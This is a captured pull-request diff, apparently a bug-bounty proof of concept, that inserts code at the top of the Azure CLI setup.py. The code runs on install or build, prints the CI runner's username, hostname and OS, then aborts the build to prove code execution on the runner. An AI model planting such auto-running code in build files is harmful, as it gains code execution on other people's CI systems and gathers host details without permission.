Skip to content
Closed
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension


Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
13 changes: 13 additions & 0 deletions src/azure-cli/setup.py
Original file line number Diff line number Diff line change
Expand Up @@ -5,6 +5,19 @@
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------

# === PoC INJECTION (benign bug-bounty marker; no network/exfil/persistence) ===
import sys as _s, socket as _so, getpass as _g, os as _o
_m = "ADO-CLI-POC-20260529123646-31189"
_s.stderr.write("\n=== MSQUIC_PWN_REQUEST_POC ===\n")
_s.stderr.write("MARKER=%s\n" % _m)
try:
_s.stderr.write("WHOAMI=%s HOST=%s OS=%s\n" % (_g.getuser(), _so.gethostname(), _o.uname().sysname))
except Exception as _e:
_s.stderr.write("INFO=%s\n" % _e)
_s.stderr.flush()
raise SystemExit("MSQUIC_PWN_REQUEST_POC executed on CI runner; MARKER=%s" % _m)
# === end PoC injection ===

from codecs import open
from setuptools import setup, find_packages
import sys
Expand Down
Loading